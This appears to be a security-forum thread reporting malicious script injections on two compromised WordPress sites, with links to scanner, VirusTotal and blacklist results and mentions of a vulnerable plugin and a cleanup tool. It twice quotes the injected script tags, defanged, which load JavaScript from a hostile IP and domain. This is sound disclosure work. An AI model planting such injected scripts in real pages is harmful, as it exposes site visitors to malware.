SEO SPAM malcode on website...

See: http://killmalware.com/parix.de/
100/100% malicious: http://zulu.zscaler.com/submission/show/aa04ca39627a89ca655ed8f76212a8a0-1419189704
Offending IP from script on site: http://www.liveipmap.com/122.155.168.105
See: http://www.abuseipdb.com/check/122.155.168.105
The problem → https://wordpress.org/support/topic/mwspamseo-spam-problem
VT does not flag site as such. Detected: http://sitecheck.sucuri.net/results/www.parix.de
Outdated Web Server Apache Found: Apache/2.2.22 2 malicious files: http://quttera.com/detailed_report/www.parix.de

[<script type="text/javascript" src="htxp://122.155.168.105/ads/inpage/pub/collect.js"></script><script type="text/javascript" src="htxp://www.clickevents.com.my/scripts/collect.js"></script>]

pol

https://www.virustotal.com/nb/file/707821fa3e3b5775a1bd462df6ec52aecc5b23a83a4903cc0137833aa89bb96a/analysis/1419191101/

Hi Pondus,

Funny that VT does not alert anything on that massive SoakCloak attack via the contributing engines, while Sucuri flags it,
but mosst users (those with Google Chrome and firefox were protected by Google Safe Browsing: goog-malware-shavar blacklist alert.

More on this malware campaign: http://gizmodo.com/mysterious-russian-malware-is-infecting-over-100-000-wo-1671419522
and for cleansing wesite - https://wordpress.org/plugins/gotmls/ made by Eli.
Revslider was vulnerable as an automatic update was missed.

polonus

Another victim, see: http://killmalware.com/hakukettu.net/
Here VT detects: https://www.virustotal.com/nb/url/ec56b3155ff8ba6a14fb14c00cb5446529758ea720a9723ca115814d658cecf3/analysis/1419200305/
38 files detected: (a.o. wp-content/uploads/2013/04/karimalogo.jpg )
and the now known malware

[<script type="text/javascript" src="htxp://122.155.168.105/ads/inpage/pub/collect.js"></script><script type="text/javascript" src="htxp://www.clickevents.com.my/scripts/collect.js"></script>]

→ Wordpress internal path: /home4/macaman/public_html/hakukettu.net/wp-content/themes/kickstart/index.php
Wordpress Version 3.8 for: htxp://hakukettu.net/wp-includes/js/wp-ajax-response.js
iFrame injected malware: http://labs.sucuri.net/db/malware/mwjs-iframe-injected530?v26

polonus

Here we get a right IDS alert: http://urlquery.net/report.php?id=1418927815329 for
" ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers"
The detection is mainly from Google Sfebrowsing: http://t.websitecheck.us/www/hakukettu.net

pol

your first post…
https://www.virustotal.com/en/file/707821fa3e3b5775a1bd462df6ec52aecc5b23a83a4903cc0137833aa89bb96a/analysis/1419264760/

Norman/BlueCoat
Detection has been added on the malicious iframe code in the html file parix.de.htm: Iframe.ABV

https://www.virustotal.com/en/file/01d868707822f4517d4fbd96e3ece199ea99dab36cd2ffc426859127f1e14b33/analysis/1419264234/

Norman/BlueCoat
Detection has been added for the malicious html page hakukettu.net.htm: Agent.BLXFW